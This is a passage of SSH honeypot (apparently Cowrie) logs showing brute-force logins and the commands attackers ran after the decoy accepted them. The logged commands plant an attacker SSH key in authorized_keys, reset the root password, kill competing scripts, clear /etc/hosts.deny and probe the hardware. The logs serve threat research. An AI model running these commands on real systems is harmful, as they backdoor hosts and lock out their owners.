ib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.684502Z","src_ip":"212.227.235.229","session":"f3bf5ccce88e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.776452Z","src_ip":"213.6.203.226","session":"3ed178a41d83"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":44105,"dst_ip":"1.2.3.4","dst_port":22,"session":"538b669c8e36","protocol":"ssh","message":"New connection: 213.6.203.226:44105 (1.2.3.4:22) [session: 538b669c8e36]","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.842991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.843682Z","src_ip":"213.6.203.226","session":"538b669c8e36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.909896Z","src_ip":"213.6.203.226","session":"538b669c8e36"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:45:33.215083Z","src_ip":"213.6.203.226","session":"538b669c8e36"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:33.282212Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:33.283130Z","src_ip":"213.6.203.226","session":"538b669c8e36"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:45:33.710084Z","src_ip":"212.227.235.229","session":"f3bf5ccce88e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:34.882064Z","src_ip":"212.227.235.229","session":"f3bf5ccce88e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64696,"dst_ip":"1.2.3.4","dst_port":22,"session":"c773805c1024","protocol":"ssh","message":"New connection: 212.227.235.229:64696 (1.2.3.4:22) [session: c773805c1024]","sensor":"my-vps","timestamp":"2025-09-09T05:46:09.053901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:09.054857Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:09.196649Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.login.success","username":"root","password":"1221","message":"login attempt [root/1221] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:46:09.747043Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:10.058960Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.059643Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.060736Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.204051Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:10.533500Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.534172Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.670912Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.671802Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64935,"dst_ip":"1.2.3.4","dst_port":22,"session":"63962a124b38","protocol":"ssh","message":"New connection: 212.227.235.229:64935 (1.2.3.4:22) [session: 63962a124b38]","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.789932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.790587Z","src_ip":"212.227.235.229","session":"63962a124b38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:10.920486Z","src_ip":"212.227.235.229","session":"63962a124b38"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:46:11.463071Z","src_ip":"212.227.235.229","session":"63962a124b38"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:12.606852Z","src_ip":"212.227.235.229","session":"63962a124b38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37586,"dst_ip":"1.2.3.4","dst_port":22,"session":"953ee14ebda9","protocol":"ssh","message":"New connection: 212.227.235.229:37586 (1.2.3.4:22) [session: 953ee14ebda9]","sensor":"my-vps","timestamp":"2025-09-09T05:46:12.975118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:12.976420Z","src_ip":"212.227.235.229","session":"953ee14ebda9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:46:13.054084Z","src_ip":"212.227.235.229","session":"953ee14ebda9"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-09T05:46:13.404722Z","src_ip":"212.227.235.229","session":"953ee14ebda9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:14.484939Z","src_ip":"212.227.235.229","session":"953ee14ebda9"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:16.346011Z","src_ip":"212.227.235.229","session":"1ea6c9cc292a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:18.755664Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T05:46:18.756402Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:18.910177Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:19.289510Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"echo \"root:ORPdo9RntAYw\"|chpasswd|bash","message":"CMD: echo \"root:ORPdo9RntAYw\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T05:46:19.290257Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/528dab364aaf1e1ed784abaedb852d63279cff5d4759f3ad377a31dae2e2b0e4","size":21,"shasum":"528dab364aaf1e1ed784abaedb852d63279cff5d4759f3ad377a31dae2e2b0e4","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/528dab364aaf1e1ed784abaedb852d63279cff5d4759f3ad377a31dae2e2b0e4 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:19.428042Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:19.810303Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T05:46:19.810993Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T05:46:19.937962Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:19.938934Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:20.217876Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T05:46:20.218683Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:20.353976Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:20.741657Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T05:46:20.742502Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:20.882917Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:21.163599Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T05:46:21.164416Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T05:46:21.165009Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:21.299073Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:21.656858Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T05:46:21.657595Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:21.791974Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:22.125147Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T05:46:22.125823Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:22.255108Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:22.553123Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T05:46:22.553815Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:22.688013Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:23.065601Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T05:46:23.066334Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:23.201871Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:23.502392Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T05:46:23.503102Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:46:23.660048Z","src_ip":"212.227.235.229","session":"c773805c1024"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55742,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd93d78a780f","protocol":"ssh","message":"New connection: 212.227.235.229:55742 (1.2.3.4:22) [session: dd93d78a780f]","sensor":"my-vps","timestamp":"2025-09-09T05:46:23.755618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:46:23.756541Z","src_ip":"212.227.235.229","session":"dd93d78a780f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:46:24.030743Z","src_ip":"212.227.235.229","session":"c773805c1024"}
